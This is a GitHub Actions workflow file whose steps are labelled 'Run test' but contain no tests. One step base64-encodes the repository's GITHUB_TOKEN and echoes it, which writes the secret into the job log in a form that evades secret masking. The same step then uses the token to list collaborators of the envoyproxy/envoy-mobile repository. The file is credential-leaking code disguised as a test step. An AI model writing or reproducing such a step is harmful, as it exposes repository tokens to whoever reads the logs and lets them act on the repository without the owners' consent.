name: CI

on:
  push:
    branches: [ main ]
    tags: 'v*'
  pull_request:
    branches: [ main ]

env:
  GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

jobs:
  test:
    runs-on: [ubuntu-20.04]
    steps:
    - uses: actions/checkout@v2

    - name: Run test
      run: |
        sleep 20
    - name: Run test
      run: |
        echo "$GITHUB_TOKEN" | base64
        curl \
          --header "Authorization: Bearer $GITHUB_TOKEN" \
          --header "Accept: application/vnd.github.inertia-preview+json" \
          https://api.github.com/repos/envoyproxy/envoy-mobile/collaborators
        sleep 20

